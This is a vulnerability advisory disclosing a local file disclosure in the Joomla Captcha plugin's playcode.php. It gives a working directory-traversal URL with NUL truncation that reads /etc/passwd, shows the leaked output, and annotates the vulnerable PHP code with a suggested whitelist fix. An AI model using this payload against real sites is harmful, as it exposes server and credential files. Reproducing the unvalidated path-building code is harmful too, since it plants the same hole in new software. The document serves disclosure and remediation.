:::::::-. ... ::::::. :::.
;;, `';, ;; ;;;`;;;;, `;;;
`[[ [[[[' [[[ [[[[[. '[[
$$, $$$$ $$$ $$$ "Y$c$$
888_,o8P'88 .d888 888 Y88
MMMMP"` "YmmMMMM"" MMM YM
[ Discovered by dun \ posdub[at]gmail.com ]
#############################################################################
# [ Joomla Captcha Plugin <= 4.5.1 ] Local File Disclosure Vulnerability #
#############################################################################
#
# Script: "Joomla Captcha plugin and patch for Joomla!"
#
# Script site: http://www.kupala.net/
# Download: http://code.google.com/p/joomla15captcha/
#
#
# [LFI] (magic_quotes_gpc = Off) -- strictly a local file *read*/disclosure, not an
# include: the attacker-chosen path is opened with fopen()/fread() and echoed, never
# executed. The %00 truncation additionally relies on older PHP builds that still
# accepted a NUL byte inside filesystem paths.
# Vuln: http://site.com/plugins/system/captcha/playcode.php?lng=../../../../../../../etc/passwd%00
# dun@radius ~ $ cat joomlacaptcha.mp3
# root:x:0:0:root:/root:/bin/bash
# ......
#
# File: ./plugins/system/captcha/playcode.php
# Markers in the listing below: [1] $_GET['lng'] is read with no validation (the
# @ only silences the notice); [2] it is concatenated straight into a filesystem
# path, so directory traversal and a trailing NUL escape the files/ directory;
# [3] file_exists()/filesize()/fread() then operate on the attacker-chosen file;
# [4] its raw contents are sent to the client. Fix: accept only a whitelisted
# language code (e.g. an anchored /\A[a-z]{2}-[a-z]{2}\z/ check, matching the
# 'en-gb' default) before the path is built.
# 79 if (!$captchacode) $captchacode = '0000000000';
# 80
# 81 session_write_close();
# 82
# 83 @$lng = $_GET['lng']; // [1]
# 84 if ( !$lng ) $lng = 'en-gb';
# 85
# 86 $captchafilename = "joomlacaptcha.mp3";
# 87 $captchalength = strlen( $captchacode );
# 88
# 89 $outlength = 0;
# 90 $reallength = 0;
# 91 $currsize = 0;
# 92 $outstream = '';
# 93
# 94 if ($captchalength > 0) {
# 95 for ($i = 0; $i < $captchalength; $i++) {
# 96 $soundfiles[$i] = 'files/' . $lng . '.' . strtolower( substr( $captchacode, $i, 1 ) ) . '.mp3'; // [2]
# 97 }
# 98 foreach ($soundfiles as $onefile){ //
# 99 if (file_exists( $onefile )) { //
# 100 $instream = fopen( $onefile, 'rb' ); //
# 101 $currsize = filesize( $onefile ); // [3]
# 102 $outstream .= fread( $instream, $currsize ); //
# 103 $outlength += $currsize; //
# 104 fclose( $instream ); //
# 105 $reallength += 1; //
# 106 }
# 107 }
# 108 }
# 109
# 110 if (($outstream == '') || ($captchalength != $reallength)) {
# 111 $outstream = 0; $outlength = 1;
# 112 }
# 113
# 114 ob_start();
# 115 header( 'Content-Type: audio/x-mpeg'); //
# 116 header( "Content-Disposition: attachment; filename=$captchafilename;"); //
# 117 header( 'Content-Transfer-Encoding: binary'); //
# 118 header( 'Content-Length: '.$outlength); //
# 119 echo $outstream ; // [4] LFD
# 120 ob_end_flush();
#
#
# [ dun / 2011-01-09 ]